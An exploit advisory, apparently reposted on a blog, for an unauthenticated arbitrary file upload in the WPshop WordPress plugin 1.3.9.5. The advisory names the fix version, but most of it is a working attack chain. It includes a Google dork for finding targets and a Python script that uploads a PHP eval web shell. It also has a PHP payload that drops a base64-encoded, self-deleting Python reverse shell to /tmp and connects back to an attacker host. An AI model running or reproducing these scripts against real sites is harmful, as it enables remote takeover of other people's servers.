WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

#-Title: WordPress WPshop eCommerce 1.3.9.5 Shell Upload

#-Author: g0blin
#-Lab : research[dot]g0blin[dot]co[dot]uk

#-Date: 2015-03-02

#-Link Download : wordpress. org/plugins/wpshop/

#-Google Dork: inurl:wp-content/themes/wpshop/

#-Tested on : Linux

#-Fixed in : 1.3.9.6

////////////////////////////////////////////////////////////////////////////////////////////

Information of Bug :

CVSS Score : 6.4
CSSS Vector : CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope : remote
Authorization Required : None

When Vulnerable : Blank

Description :

The script �includes/ajax.php� allows execution of various actions by anonymous users. The action name is provided in the �elementCode� parameter. One of these actions is named �ajaxUpload�. This function allows for upload of arbitrary files, due to lack of sanitation of user input.

Solution:

Update to version 1.3.9.6.

-- Proof Of Concept --

require : Python (file.py)

How To use :

Python Name-script.py http://web. com back_python (your-ip) 1337

- Example :

Python wpshop.py http://web. com back_python.php 192.168.2.116 1337

Script wpshop.py :

#!/usr/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150427.1
# Licence: WTFPL - wtfpl.net
import requests
import sys
__version__ = "20150427.1"

def banner():
    print """\x1b[1;32m
��+    ��+������+ �������+��+  ��+ ������+ ������+ ��+    ��+���+   ��+
���    �����+--��+��+----+���  �����+-����+��+--��+���    �������+  ���
��� �+ ���������++�������+�������������+���������++��� �+ �����+��+ ���
������+�����+---+ +----�����+--�������++�����+---+ ������+������+��+���
+���+���++���     �����������  ���+������++���     +���+���++��� +�����
 +--++--+ +-+     +------++-+  +-+ +-----+ +-+      +--++--+ +-+  +---+
 Exploit for WPShop Ecommerce, WPVDB-7830 Version: %s\x1b[0m""" %(__version__)

def php_encoder(php):
    f = open(php, "r").read()
    f = f.replace("<?php", "")
    f = f.replace("?>", "")
    encoded = f.encode('base64')
    encoded = encoded.replace("\n", "")
    encoded = encoded.strip()
    code = "eval(base64_decode('%s'));" %(encoded)
    return code

def shell_upload(url):
    target_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    try:
        print "\x1b[1;32m{+} Using target URL of: %s\x1b[0m" %(target_url)    
        r = requests.post(url=target_url, files={"wpshop_file":("test.php", "<?php @assert(filter_input(0,woot,516)); ?>")})
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        return r.text.strip()
    else:
        sys.exit("\x1b[1;31m{-} Something fucked up... Our shell was not uploaded :/\x1b[0m")


def spawn_backconnect(shell_url, payload, cb_host, cb_port):
    cookies = {'host': cb_host, 'port': cb_port}
    data = {'woot': payload}
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
    try:
        print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
        r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        print r.text

def pop_shell(target, code, cb_host, cb_port):
    shell_url = shell_upload(url=target)    
    print "\x1b[1;32m{+} Our shell is at: %s\x1b[0m" %(shell_url)
    try:
        print "\x1b[1;36m{*} Sending Backconnect to %s:%s...\x1b[0m" %(cb_host, cb_port)
        spawn_backconnect(shell_url=shell_url, payload=code, cb_host=cb_host, cb_port=cb_port)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))

def main(args):
    banner()
    if len(args) != 5:
        sys.exit("use: %s http://host/wordpress_baseurl/ <payload.php> <cb_host> <cb_port>" %(args[0]))
    pop_shell(target=args[1], code=php_encoder(args[2]), cb_host=args[3], cb_port=args[4])

if __name__ == "__main__":
    main(args=sys.argv)

Script back_python.php :

<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell = 
"IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>

Result Shell : Here !!

CUMA NEWBIE YANG MAU BERKREASI

Halaman

WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

Tidak ada komentar:

Posting Komentar